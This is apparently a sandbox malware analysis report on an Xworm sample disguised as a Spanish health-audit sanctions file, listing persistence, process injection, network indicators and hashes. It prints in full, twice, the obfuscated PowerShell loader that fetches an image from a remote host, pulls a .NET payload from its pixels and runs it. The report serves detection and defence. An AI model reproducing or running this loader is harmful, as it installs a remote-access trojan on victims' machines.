Analysis Overview
SHA256
0fd706ebd884e6678f5d0c73c42d7ee05dcddd53963cf53542d5a8084ea82ad1
Threat Level: Known bad
The file NUEVO_REPORTE_ANEXO_POR_SANCIONES_EFECTUADAS_HALLAZGOS_IRREGULARIDADES_AUDITORIA_SISTEMAS_DE_SALUD_ENTIDADES_PRESTADORAS was found to be: Known bad.
Malicious Activity Summary
Xworm family
Detect Xworm Payload
Xworm
Blocklisted process makes network request
Command and Scripting Interpreter: PowerShell
Checks computer location settings
Adds Run key to start application
Suspicious use of SetThreadContext
Enumerates physical storage devices
Command and Scripting Interpreter: JavaScript
System Location Discovery: System Language Discovery
Modifies registry class
Suspicious behavior: EnumeratesProcesses
Suspicious use of AdjustPrivilegeToken
Suspicious use of WriteProcessMemory
MITRE ATT&CK
Enterprise Matrix V16
Analysis: static1
Detonation Overview
Reported
2025-07-02 18:52
Signatures
Analysis: behavioral1
Detonation Overview
Submitted
2025-07-02 18:52
Reported
2025-07-02 18:54
Platform
win10v2004-20250610-en
Max time kernel
103s
Max time network
146s
Command Line
Signatures
Detect Xworm Payload
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
Xworm
Xworm family
Blocklisted process makes network request
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\system32\wscript.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WScript.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Command and Scripting Interpreter: PowerShell
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Checks computer location settings
| Description | Indicator | Process | Target |
| Key value queried | \REGISTRY\USER\S-1-5-21-2012121138-1878458325-808874697-1000\Control Panel\International\Geo\Nation | C:\Windows\system32\cmd.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-2012121138-1878458325-808874697-1000\Control Panel\International\Geo\Nation | C:\Windows\System32\WScript.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-2012121138-1878458325-808874697-1000\Control Panel\International\Geo\Nation | C:\Windows\system32\wscript.exe | N/A |
Adds Run key to start application
| Description | Indicator | Process | Target |
| Set value (str) | \REGISTRY\USER\S-1-5-21-2012121138-1878458325-808874697-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Path = "C:\\Users\\Public\\Downloads\\agnosticism.js" | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-2012121138-1878458325-808874697-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Path = "C:\\Users\\Public\\Downloads\\agnosticism.js" | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious use of SetThreadContext
| Description | Indicator | Process | Target |
| PID 1328 set thread context of 4000 | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exe |
| PID 2220 set thread context of 1452 | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exe |
Command and Scripting Interpreter: JavaScript
Enumerates physical storage devices
System Location Discovery: System Language Discovery
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exe | N/A |
Modifies registry class
| Description | Indicator | Process | Target |
| Key created | \REGISTRY\USER\S-1-5-21-2012121138-1878458325-808874697-1000_Classes\Local Settings | C:\Windows\system32\cmd.exe | N/A |
Suspicious behavior: EnumeratesProcesses
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exe | N/A |
Suspicious use of WriteProcessMemory
Processes
C:\Windows\system32\wscript.exe
wscript.exe C:\Users\Admin\AppData\Local\Temp\NUEVO_REPORTE_ANEXO_POR_SANCIONES_EFECTUADAS_HALLAZGOS_IRREGULARIDADES_AUDITORIA_SISTEMAS_DE_SALUD_ENTIDADES_PRESTADORAS.js
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w hidden -noprofile -ep bypass -c "$absolutions='JGNydWVsbCA9ICdWa0ZKJzskTWFjb3dhbml0ZXMgPSBbU3lzdGVtLkNvbnZlcnRdOjpGcm9tQmFzZTY0U3RyaW5nKCRjcnVlbGwpOyRkaXNlbWJhcmsgPSBbU3lzdGVtLlRleHQuRW5jb2RpbmddOjpVVEY4LkdldFN0cmluZygkTWFjb3dhbml0ZXMpOyRzZW1pYnJldmUgPSAnUTJ4aGMzTk1hV0p5WVhKNU1TNUliMjFsJzskcGhvc3Bob3BlcHRpZGUgPSBbU3lzdGVtLkNvbnZlcnRdOjpGcm9tYmFzZTY0U3RyaW5nKCRzZW1pYnJldmUpOyR3b29ka25hY2tlciA9IFtTeXN0ZW0uVGV4dC5FbmNvZGluZ106OlVURjguR2V0U3RyaW5nKCRwaG9zcGhvcGVwdGlkZSk7QWRkLVR5cGUgLUFzc2VtYmx5TmFtZSBTeXN0ZW0uRHJhd2luZzskdGVsZW9sb2dpc209J2h0dHBzOi8vYXJjaGl2ZS5vcmcvZG93bmxvYWQvdW5pdmVyc2UtMTczMzM1OTMxNTIwMi04NzUwL3VuaXZlcnNlLTE3MzMzNTkzMTUyMDItODc1MC5qcGcnOyRwb2xvbmlmZXJvdXM9TmV3LU9iamVjdCBTeXN0ZW0uTmV0LldlYkNsaWVudDskcG9sb25pZmVyb3VzLkhlYWRlcnMuQWRkKCdVc2VyLUFnZW50JywnTW96aWxsYS81LjAnKTskcG94dmlydXM9JHBvbG9uaWZlcm91cy5Eb3dubG9hZERhdGEoJHRlbGVvbG9naXNtKTskcHJlc2NpZW50aWZpYz1bYnl0ZVtdXSgweDQyLCAweDRELCAweDcyLCAweDZFLCAweDM3LCAweDAwLCAweDAwLCAweDAwLCAweDAwLCAweDAwLCAweDM2LCAweDAwLCAweDAwLCAweDAwLCAweDI4LCAweDAwLCAweDAwLCAweDAwLCAweDY0LCAweDAwLCAweDAwLCAweDAwLCAweDRELCAweDJGLCAweDAwLCAweDAwLCAweDAxLCAweDAwLCAweDE4LCAweDAwLCAweDAwLCAweDAwLCAweDAwLCAweDAwLCAweDNDLCAweDZFLCAweDM3LCAweDAwLCAweEM0LCAweDBFLCAweDAwLCAweDAwLCAweEM0LCAweDBFLCAweDAwLCAweDAwLCAweDAwLCAweDAwLCAweDAwLCAweDAwLCAweDAwLCAweDAwLCAweDAwLCAweDAwKTskZHVzdG1lbj0tMTtmb3IoJGRpc3NpbWlsYXI9MDskZGlzc2ltaWxhciAtbGUgJHBveHZpcnVzLkxlbmd0aC0kcHJlc2NpZW50aWZpYy5MZW5ndGg7JGRpc3NpbWlsYXIrKyl7ICRub25tZWF0PSR0cnVlO2ZvcigkbWljcm9icmV3ZWQ9MDskbWljcm9icmV3ZWQgLWx0ICRwcmVzY2llbnRpZmljLkxlbmd0aDskbWljcm9icmV3ZWQrKyl7aWYoJHBveHZpcnVzWyRkaXNzaW1pbGFyKyRtaWNyb2JyZXdlZF0gLW5lICRwcmVzY2llbnRpZmljWyRtaWNyb2JyZXdlZF0peyRub25tZWF0PSRjcmFwbmVsO2JyZWFrfX1pZigkbm9ubWVhdCl7JGR1c3RtZW49JGRpc3NpbWlsYXI7YnJlYWt9fWlmKCRkdXN0bWVuIC1lcSAtMSl7cmV0dXJufTskQXNoZXZpbGxlPSRwb3h2aXJ1c1skZHVzdG1lbi4uKCRwb3h2aXJ1cy5MZW5ndGgtMSldOyRTbmFrZT1OZXctT2JqZWN0IElPLk1lbW9yeVN0cmVhbTskU25ha2UuV3JpdGUoJEFzaGV2aWxsZSwwLCRBc2hldmlsbGUuTGVuZ3RoKTskU25ha2UuU2VlaygwLCdCZWdpbicpfE91dC1OdWxsOyRtZXRhZXNjYWxpbmU9W0RyYXdpbmcuQml0bWFwXTo6RnJvbVN0cmVhbSgkU25ha2UpOyRtb2JpbGl0aWVzPU5ldy1PYmplY3QgQ29sbGVjdGlvbnMuR2VuZXJpYy5MaXN0W0J5dGVdO2ZvcigkcHJhdGlxdWVzPTA7JHByYXRpcXVlcyAtbHQgJG1ldGFlc2NhbGluZS5IZWlnaHQ7JHByYXRpcXVlcysrKXtmb3IoJHNwdXR0ZXJlcj0wOyRzcHV0dGVyZXIgLWx0ICRtZXRhZXNjYWxpbmUuV2lkdGg7JHNwdXR0ZXJlcisrKXskb2xpZ29uZXBocm91cz0kbWV0YWVzY2FsaW5lLkdldFBpeGVsKCRzcHV0dGVyZXIsJHByYXRpcXVlcyk7JG1vYmlsaXRpZXMuQWRkKCRvbGlnb25lcGhyb3VzLlIpOyRtb2JpbGl0aWVzLkFkZCgkb2xpZ29uZXBocm91cy5HKTskbW9iaWxpdGllcy5BZGQoJG9saWdvbmVwaHJvdXMuQil9fTskb3N0ZW90aGVjYT1bQml0Q29udmVydGVyXTo6VG9JbnQzMigkbW9iaWxpdGllcy5HZXRSYW5nZSgwLDQpLlRvQXJyYXkoKSwwKTskQWxpY29ybnM9JG1vYmlsaXRpZXMuR2V0UmFuZ2UoNCwkb3N0ZW90aGVjYSkuVG9BcnJheSgpOyRDYXJsb3ZpbmdpYW49W0NvbnZlcnRdOjpUb0Jhc2U2NFN0cmluZygkQWxpY29ybnMpLlJlcGxhY2UoJ0EnLCdAJykuUmVwbGFjZSgnQCcsJ0EnKTskc3F1YWxsZXI9JzBoSGR1SXpZeklETjRNRE14Y1RZNE1qWTJnRE0yUUdOM2dETzFNek5pSkRNMUVUWmY5bWRwVlhjeUYyTH1eOTJZdWMyYnNKMmIwTlhaMjlHYnVRbmNoUjNjczkyYndSV1lsUjJMdm9EYzBSSGEnLlJlcGxhY2UoJ31eJywndCcpOyRiZWRhZz1bQ29udmVydF06OkZyb21CYXNlNjRTdHJpbmcoJENhcmxvdmluZ2lhbik7JG1hbmh1bnRzPVtSZWZsZWN0aW9uLkFzc2VtYmx5XTo6TG9hZCgkYmVkYWcpOyRnYW1ibGVkPUAoJHNxdWFsbGVyLCcxJywnQzpcVXNlcnNcUHVibGljXERvd25sb2FkcycsJ2Fnbm9zdGljaXNtJywnanNjJywnJywnJywnJywnJywnJywnJywnanMnLCcnLCcnLCcnLCcyJywnJyk7JG1hbmh1bnRzLkdldFR5cGUoJHdvb2RrbmFja2VyKS5HZXRNZXRob2QoJGRpc2VtYmFyaykuSW52b2tlKCR0YWxsaWFnZSwkZ2FtYmxlZCk7JG1ldGFlc2NhbGluZS5EaXNwb3NlKCk7JFNuYWtlLkRpc3Bvc2UoKQ==';$Paleocene=[System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String($absolutions));Invoke-Expression $Paleocene"
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /C copy *.js "C:\Users\Public\Downloads\agnosticism.js"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c C:\Users\Public\Downloads\agnosticism.js
C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Public\Downloads\agnosticism.js"
C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exe
"C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exe"
C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exe
"C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exe"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w hidden -noprofile -ep bypass -c "$absolutions='JGNydWVsbCA9ICdWa0ZKJzskTWFjb3dhbml0ZXMgPSBbU3lzdGVtLkNvbnZlcnRdOjpGcm9tQmFzZTY0U3RyaW5nKCRjcnVlbGwpOyRkaXNlbWJhcmsgPSBbU3lzdGVtLlRleHQuRW5jb2RpbmddOjpVVEY4LkdldFN0cmluZygkTWFjb3dhbml0ZXMpOyRzZW1pYnJldmUgPSAnUTJ4aGMzTk1hV0p5WVhKNU1TNUliMjFsJzskcGhvc3Bob3BlcHRpZGUgPSBbU3lzdGVtLkNvbnZlcnRdOjpGcm9tYmFzZTY0U3RyaW5nKCRzZW1pYnJldmUpOyR3b29ka25hY2tlciA9IFtTeXN0ZW0uVGV4dC5FbmNvZGluZ106OlVURjguR2V0U3RyaW5nKCRwaG9zcGhvcGVwdGlkZSk7QWRkLVR5cGUgLUFzc2VtYmx5TmFtZSBTeXN0ZW0uRHJhd2luZzskdGVsZW9sb2dpc209J2h0dHBzOi8vYXJjaGl2ZS5vcmcvZG93bmxvYWQvdW5pdmVyc2UtMTczMzM1OTMxNTIwMi04NzUwL3VuaXZlcnNlLTE3MzMzNTkzMTUyMDItODc1MC5qcGcnOyRwb2xvbmlmZXJvdXM9TmV3LU9iamVjdCBTeXN0ZW0uTmV0LldlYkNsaWVudDskcG9sb25pZmVyb3VzLkhlYWRlcnMuQWRkKCdVc2VyLUFnZW50JywnTW96aWxsYS81LjAnKTskcG94dmlydXM9JHBvbG9uaWZlcm91cy5Eb3dubG9hZERhdGEoJHRlbGVvbG9naXNtKTskcHJlc2NpZW50aWZpYz1bYnl0ZVtdXSgweDQyLCAweDRELCAweDcyLCAweDZFLCAweDM3LCAweDAwLCAweDAwLCAweDAwLCAweDAwLCAweDAwLCAweDM2LCAweDAwLCAweDAwLCAweDAwLCAweDI4LCAweDAwLCAweDAwLCAweDAwLCAweDY0LCAweDAwLCAweDAwLCAweDAwLCAweDRELCAweDJGLCAweDAwLCAweDAwLCAweDAxLCAweDAwLCAweDE4LCAweDAwLCAweDAwLCAweDAwLCAweDAwLCAweDAwLCAweDNDLCAweDZFLCAweDM3LCAweDAwLCAweEM0LCAweDBFLCAweDAwLCAweDAwLCAweEM0LCAweDBFLCAweDAwLCAweDAwLCAweDAwLCAweDAwLCAweDAwLCAweDAwLCAweDAwLCAweDAwLCAweDAwLCAweDAwKTskZHVzdG1lbj0tMTtmb3IoJGRpc3NpbWlsYXI9MDskZGlzc2ltaWxhciAtbGUgJHBveHZpcnVzLkxlbmd0aC0kcHJlc2NpZW50aWZpYy5MZW5ndGg7JGRpc3NpbWlsYXIrKyl7ICRub25tZWF0PSR0cnVlO2ZvcigkbWljcm9icmV3ZWQ9MDskbWljcm9icmV3ZWQgLWx0ICRwcmVzY2llbnRpZmljLkxlbmd0aDskbWljcm9icmV3ZWQrKyl7aWYoJHBveHZpcnVzWyRkaXNzaW1pbGFyKyRtaWNyb2JyZXdlZF0gLW5lICRwcmVzY2llbnRpZmljWyRtaWNyb2JyZXdlZF0peyRub25tZWF0PSRjcmFwbmVsO2JyZWFrfX1pZigkbm9ubWVhdCl7JGR1c3RtZW49JGRpc3NpbWlsYXI7YnJlYWt9fWlmKCRkdXN0bWVuIC1lcSAtMSl7cmV0dXJufTskQXNoZXZpbGxlPSRwb3h2aXJ1c1skZHVzdG1lbi4uKCRwb3h2aXJ1cy5MZW5ndGgtMSldOyRTbmFrZT1OZXctT2JqZWN0IElPLk1lbW9yeVN0cmVhbTskU25ha2UuV3JpdGUoJEFzaGV2aWxsZSwwLCRBc2hldmlsbGUuTGVuZ3RoKTskU25ha2UuU2VlaygwLCdCZWdpbicpfE91dC1OdWxsOyRtZXRhZXNjYWxpbmU9W0RyYXdpbmcuQml0bWFwXTo6RnJvbVN0cmVhbSgkU25ha2UpOyRtb2JpbGl0aWVzPU5ldy1PYmplY3QgQ29sbGVjdGlvbnMuR2VuZXJpYy5MaXN0W0J5dGVdO2ZvcigkcHJhdGlxdWVzPTA7JHByYXRpcXVlcyAtbHQgJG1ldGFlc2NhbGluZS5IZWlnaHQ7JHByYXRpcXVlcysrKXtmb3IoJHNwdXR0ZXJlcj0wOyRzcHV0dGVyZXIgLWx0ICRtZXRhZXNjYWxpbmUuV2lkdGg7JHNwdXR0ZXJlcisrKXskb2xpZ29uZXBocm91cz0kbWV0YWVzY2FsaW5lLkdldFBpeGVsKCRzcHV0dGVyZXIsJHByYXRpcXVlcyk7JG1vYmlsaXRpZXMuQWRkKCRvbGlnb25lcGhyb3VzLlIpOyRtb2JpbGl0aWVzLkFkZCgkb2xpZ29uZXBocm91cy5HKTskbW9iaWxpdGllcy5BZGQoJG9saWdvbmVwaHJvdXMuQil9fTskb3N0ZW90aGVjYT1bQml0Q29udmVydGVyXTo6VG9JbnQzMigkbW9iaWxpdGllcy5HZXRSYW5nZSgwLDQpLlRvQXJyYXkoKSwwKTskQWxpY29ybnM9JG1vYmlsaXRpZXMuR2V0UmFuZ2UoNCwkb3N0ZW90aGVjYSkuVG9BcnJheSgpOyRDYXJsb3ZpbmdpYW49W0NvbnZlcnRdOjpUb0Jhc2U2NFN0cmluZygkQWxpY29ybnMpLlJlcGxhY2UoJ0EnLCdAJykuUmVwbGFjZSgnQCcsJ0EnKTskc3F1YWxsZXI9JzBoSGR1SXpZeklETjRNRE14Y1RZNE1qWTJnRE0yUUdOM2dETzFNek5pSkRNMUVUWmY5bWRwVlhjeUYyTH1eOTJZdWMyYnNKMmIwTlhaMjlHYnVRbmNoUjNjczkyYndSV1lsUjJMdm9EYzBSSGEnLlJlcGxhY2UoJ31eJywndCcpOyRiZWRhZz1bQ29udmVydF06OkZyb21CYXNlNjRTdHJpbmcoJENhcmxvdmluZ2lhbik7JG1hbmh1bnRzPVtSZWZsZWN0aW9uLkFzc2VtYmx5XTo6TG9hZCgkYmVkYWcpOyRnYW1ibGVkPUAoJHNxdWFsbGVyLCcxJywnQzpcVXNlcnNcUHVibGljXERvd25sb2FkcycsJ2Fnbm9zdGljaXNtJywnanNjJywnJywnJywnJywnJywnJywnJywnanMnLCcnLCcnLCcnLCcyJywnJyk7JG1hbmh1bnRzLkdldFR5cGUoJHdvb2RrbmFja2VyKS5HZXRNZXRob2QoJGRpc2VtYmFyaykuSW52b2tlKCR0YWxsaWFnZSwkZ2FtYmxlZCk7JG1ldGFlc2NhbGluZS5EaXNwb3NlKCk7JFNuYWtlLkRpc3Bvc2UoKQ==';$Paleocene=[System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String($absolutions));Invoke-Expression $Paleocene"
C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exe
"C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exe"
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | deadpoolstart.lovestoblog.com | udp |
| GB | 185.27.134.165:80 | deadpoolstart.lovestoblog.com | tcp |
| US | 8.8.8.8:53 | archive.org | udp |
| US | 207.241.224.2:443 | archive.org | tcp |
| GB | 185.27.134.165:80 | deadpoolstart.lovestoblog.com | tcp |
| GB | 185.27.134.165:80 | deadpoolstart.lovestoblog.com | tcp |
| US | 207.241.224.2:443 | archive.org | tcp |
| US | 8.8.8.8:53 | tse1.mm.bing.net | udp |
| US | 150.171.28.10:443 | tse1.mm.bing.net | tcp |
| US | 150.171.28.10:443 | tse1.mm.bing.net | tcp |
| US | 150.171.28.10:443 | tse1.mm.bing.net | tcp |
| US | 150.171.28.10:443 | tse1.mm.bing.net | tcp |
| US | 150.171.28.10:443 | tse1.mm.bing.net | tcp |
| US | 8.8.8.8:53 | deadpoolstart2064.duckdns.org | udp |
| CO | 181.131.217.63:7021 | deadpoolstart2064.duckdns.org | tcp |
| GB | 185.27.134.165:80 | deadpoolstart.lovestoblog.com | tcp |
| US | 8.8.8.8:53 | c.pki.goog | udp |
| GB | 142.250.179.227:80 | c.pki.goog | tcp |
Files
memory/1328-1-0x0000029927AD0000-0x0000029927AE0000-memory.dmp
memory/1328-0-0x0000029927AD0000-0x0000029927AE0000-memory.dmp
memory/1328-2-0x0000029942190000-0x00000299421B2000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_mkfgebzc.fal.ps1
| MD5 | d17fe0a3f47be24a6453e9ef58c94641 |
| SHA1 | 6ab83620379fc69f80c0242105ddffd7d98d5d9d |
| SHA256 | 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7 |
| SHA512 | 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82 |
memory/1328-12-0x0000029927AD0000-0x0000029927AE0000-memory.dmp
memory/1328-13-0x0000029927AD0000-0x0000029927AE0000-memory.dmp
memory/1328-14-0x00000299426A0000-0x0000029942A1E000-memory.dmp
memory/1328-15-0x0000029927A50000-0x0000029927A5E000-memory.dmp
memory/1328-17-0x0000029927AD0000-0x0000029927AE0000-memory.dmp
C:\Users\Public\Downloads\agnosticism.js
| MD5 | 9b49b1a2e0327767db6dc4883654dd22 |
| SHA1 | 486be1d6c5d4f2f6d7b80613aeae32ed3a7a69ba |
| SHA256 | 761b67f0715d7f89c50cdb2dd4a18a49952a21d301907bafbaf0942179afdb30 |
| SHA512 | b473926aa77d0827eefeafc7ee8a59989e936ef3c0b7b316b0ab5eb7a34a993c2734419c7a80c8505904dcdb31c672156f33fe6e26084b3d8e8c1b565f6bc206 |
memory/4000-20-0x0000000000400000-0x000000000040E000-memory.dmp
memory/4000-23-0x00000000052E0000-0x000000000537C000-memory.dmp
C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log
| MD5 | 4603c253796ff07ae786a16894b49206 |
| SHA1 | 4c15e20377d861717b0668c1571ca6ad2f773fe6 |
| SHA256 | e2d57c03c72f56be9c7ed107864003befae22a7498ee40bd21ed4e63481c4afe |
| SHA512 | cc9d0aa73b231bc9979b0c1f38a09e549d927caf5bbfe8fd088feabbdd651d0beb301ef1825e027437bdae45eddc26ae03b5bba2e25976051526b47e657f19f7 |
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
| MD5 | 81fba9af5c9fbee260bee735e50ffb93 |
| SHA1 | 10648671e56e56b52e0ca50063f0493949e595fb |
| SHA256 | c8e4c56c301eb93c1f3eca54652687455776b2262f5d74b78326c6829b0b16fa |
| SHA512 | 7c973376c1006b4ec7747b65f66017927ddf49bf4dcbed440f82f4511e72a344f6a4d980d41e2a2d19ca5c2ad11952644fa4dfbe98902240a449befa0c0dd710 |
memory/4000-35-0x00000000059F0000-0x0000000005A56000-memory.dmp
memory/4000-36-0x0000000006510000-0x00000000065A2000-memory.dmp
memory/4000-37-0x0000000006B60000-0x0000000007104000-memory.dmp
Analysis: behavioral2
Detonation Overview
Submitted
2025-07-02 18:52
Reported
2025-07-02 18:54
Platform
win11-20250619-en
Max time kernel
136s
Max time network
149s
Command Line
Signatures
Detect Xworm Payload
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
Xworm
Xworm family
Blocklisted process makes network request
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\system32\wscript.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WScript.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Command and Scripting Interpreter: PowerShell
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Adds Run key to start application
| Description | Indicator | Process | Target |
| Set value (str) | \REGISTRY\USER\S-1-5-21-625765727-1271952295-745797415-1000\Software\Microsoft\Windows\CurrentVersion\Run\Path = "C:\\Users\\Public\\Downloads\\agnosticism.js" | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-625765727-1271952295-745797415-1000\Software\Microsoft\Windows\CurrentVersion\Run\Path = "C:\\Users\\Public\\Downloads\\agnosticism.js" | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious use of SetThreadContext
| Description | Indicator | Process | Target |
| PID 1620 set thread context of 4552 | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exe |
| PID 1308 set thread context of 5004 | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exe |
Command and Scripting Interpreter: JavaScript
Enumerates physical storage devices
System Location Discovery: System Language Discovery
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exe | N/A |
Modifies registry class
| Description | Indicator | Process | Target |
| Key created | \REGISTRY\USER\S-1-5-21-625765727-1271952295-745797415-1000_Classes\Local Settings | C:\Windows\system32\cmd.exe | N/A |
Suspicious behavior: EnumeratesProcesses
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exe | N/A |
Suspicious use of WriteProcessMemory
Processes
C:\Windows\system32\wscript.exe
wscript.exe C:\Users\Admin\AppData\Local\Temp\NUEVO_REPORTE_ANEXO_POR_SANCIONES_EFECTUADAS_HALLAZGOS_IRREGULARIDADES_AUDITORIA_SISTEMAS_DE_SALUD_ENTIDADES_PRESTADORAS.js
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
